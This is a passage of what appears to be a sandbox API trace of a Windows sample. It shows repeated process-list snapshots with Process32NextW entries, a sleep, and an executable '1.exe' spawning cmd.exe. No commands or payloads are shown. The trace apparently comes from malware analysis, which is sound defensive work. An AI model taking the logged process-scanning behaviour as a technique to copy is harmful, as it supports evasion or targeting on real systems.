szExeFile="OfficeClickToRun.exe")) returned 1 [0045.695] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0045.696] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0045.696] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0045.697] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0045.698] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0045.698] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0045.699] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0045.699] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0045.999] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0045.999] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0046.000] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0046.001] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0046.001] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0046.002] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0046.003] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0046.003] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0046.004] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0046.004] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0046.005] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0046.005] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0046.006] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0046.007] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0046.007] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0046.008] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0046.008] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0046.009] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0046.010] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0046.010] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0046.011] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0046.012] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0046.013] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0046.013] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0046.014] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0046.015] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0046.016] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0046.016] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0046.017] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0046.018] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0046.018] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0046.019] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.020] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.020] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0046.021] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0046.022] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.022] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0046.023] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0046.024] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.024] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.025] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0046.026] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.026] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0046.027] CloseHandle (hObject=0x300) returned 1 [0046.027] Sleep (dwMilliseconds=0x1f4) [0046.683] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e4 [0046.715] Process32FirstW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0046.716] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0046.717] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0046.718] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.718] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0046.719] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.719] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0046.720] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0046.721] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0046.721] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.722] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0046.723] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0046.723] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.724] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0046.725] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x54, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.725] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.726] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.726] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.727] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.728] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.728] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.729] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.730] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.730] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0046.731] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.755] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.756] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0046.757] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0046.757] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.758] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0046.759] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0046.759] 